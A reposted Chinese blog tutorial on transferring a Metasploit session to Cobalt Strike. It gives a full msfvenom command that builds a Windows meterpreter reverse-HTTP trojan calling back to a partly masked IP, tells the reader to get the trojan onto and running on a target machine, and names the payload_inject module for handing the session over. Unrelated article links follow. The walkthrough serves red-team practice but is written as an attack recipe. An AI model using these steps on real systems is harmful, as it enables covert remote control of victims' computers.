Meteasploit -> CS 【会话转移】
2021/8/31 17:36:19
本文主要是介绍Meteasploit -> CS 【会话转移】,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
流程:
大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS
开始:
先让服务端的CS上线
cs客户端连接cs服务端
cs设置监听
生成木马 msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx.xx.xx lport=6677 -f exe -o msf1.exe
生成后开启监听模块
查看详细常数
设置set exitonsession false
exploit -j 开始执行
然后把木马msf1.exe想办法弄到目标机上且运行起来,拿到会话如下
拿到回话之后,重新设置新模块use exploit/windows/local/payload_inject
设置参数
设置完毕后开始执行!run
转移成功
这篇关于Meteasploit -> CS 【会话转移】的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-07-02微服务启动nacos注册上去了,但是一直没有收到请求-icode9专业技术文章分享
- 2024-07-02如何检查文件的编码格式-icode9专业技术文章分享
- 2024-07-02sublime 更改编码格式-icode9专业技术文章分享
- 2024-06-30uniAPP 实现全屏左右滚动滚动的效果-icode9专业技术文章分享
- 2024-06-30如何在本地使用授权或插件-icode9专业技术文章分享
- 2024-06-30伪静态规则配置方法汇总-icode9专业技术文章分享
- 2024-06-29易优CMS安装常见问题汇总-icode9专业技术文章分享
- 2024-06-28易优新手必读安装教程-icode9专业技术文章分享
- 2024-06-28忘记eyoucms后台密码怎么办?-icode9专业技术文章分享
- 2024-06-26终极指南:Scrum中如何设置需求优先级